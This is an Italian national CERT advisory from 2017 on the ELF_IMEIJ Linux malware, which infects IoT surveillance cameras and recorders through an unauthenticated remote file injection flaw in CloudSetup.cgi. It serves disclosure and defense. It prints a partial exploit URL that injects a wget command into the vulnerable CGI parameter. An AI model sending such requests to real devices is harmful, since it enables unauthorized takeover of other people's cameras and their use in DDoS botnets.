Ministero dello Sviluppo Economico

CERT Nazionale Italia - Computer Emergency Response Team

Malware

Il malware per Linux ELF_IMEIJ si diffonde sfruttando vulnerabilità in dispositivi IoT

DDoS  ELF_IMEIJ  IoT   lunedì, 13 marzo 2017

I ricercatori di sicurezza di Trend Micro hanno scoperto una nuova famiglia di malware per Linux, identificata come ELF_IMEIJ, che prende di mira dispositivi IoT per la sorveglianza prodotti da un’unica società.

Il malware viene diffuso sfruttando una vulnerabilità in un componente CGI del firmware installato su diversi tipi di dispositivi (telecamere IP, apparati CCTV e registratori di rete) già nota dal 2016. La vulnerabilità è stata scoperta dai ricercatori di sicurezza di Search-Lab nel 2015 e, dopo diversi tentativi di contattare il produttore rimasti senza risposta, divulgata pubblicamente nell’ottobre del 2016.

Questa vulnerabilità, di tipo iniezione di file da remoto (RFI – Remote File Injection), può essere sfruttata inviando richieste HTTP POST al componente CGI CloudSetup.cgi presente in dispositivi connessi ad Internet, di cui si conosce l’indirizzo IP, con un comando simile al seguente:

http://[indirizzo IP del dispositivo]/cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O [lista parametri]

I comandi inviati al componente CGI vengono eseguiti senza autenticazione e senza alcuna verifica sul contenuto dei parametri passati. Se sfruttata con successo, questa vulnerabilità consente all’attaccante di caricare il malware ELF_IMEIJ (un eseguibile ELF per piattaforma ARM) da remoto sul dispositivo e di modificare i permessi del file per poterlo eseguire localmente.

Una volta installato e lanciato sul dispositivo il malware è in grado di compiere le seguenti attività malevole, prima di terminare l’esecuzione:

  • raccoglie informazioni sul sistema e sull’attività di rete;
  • esegue comandi di shell arbitrari;
  • effettua attacchi DDoS;
  • tenta di diffondersi contattando altri dispositivi vulnerabili sulla stessa rete.

La capacità di ELF_IMEIJ di effettuare attacchi DDoS e di diffondersi ad altri dispositivi ricorda quella del famigerato bot Mirai, anche se questo nuovo malware è in grado di attaccare dispositivi di un unico produttore.

Secondo Trend Micro, la scoperta di ELF_IMEIJ è il segnale di un sempre maggiore interesse dei creatori di malware per la piattaforma Linux e per i dispositivi IoT.

Notizie correlate

Milioni di dispositivi di videosorveglianza Xiongmai attaccabili dal Cloud

12 ottobre 2018

Sono state individuate diverse vulnerabilità nell'infrastruttura Cloud di Xiongmai che consentono di compromettere milioni di telecamere IP, DVR e NVR di questo produttore.Leggi tutto

La botnet Torii prende di mira una vasta gamma di dispositivi IoT

28 settembre 2018

I ricercatori di Avast hanno pubblicato i risultati dell'analisi di una nuova botnet IoT denominata Torii, che presenta caratteristiche tecniche molto avanzate.Leggi tutto

Vulnerabilità multiple in Samsung SmartThings Hub

27 luglio 2018

I ricercatori di sicurezza di Cisco Talos hanno scoperto numerose vulnerabilità nel controller centralizzato SmartThings Hub di Samsung.Leggi tutto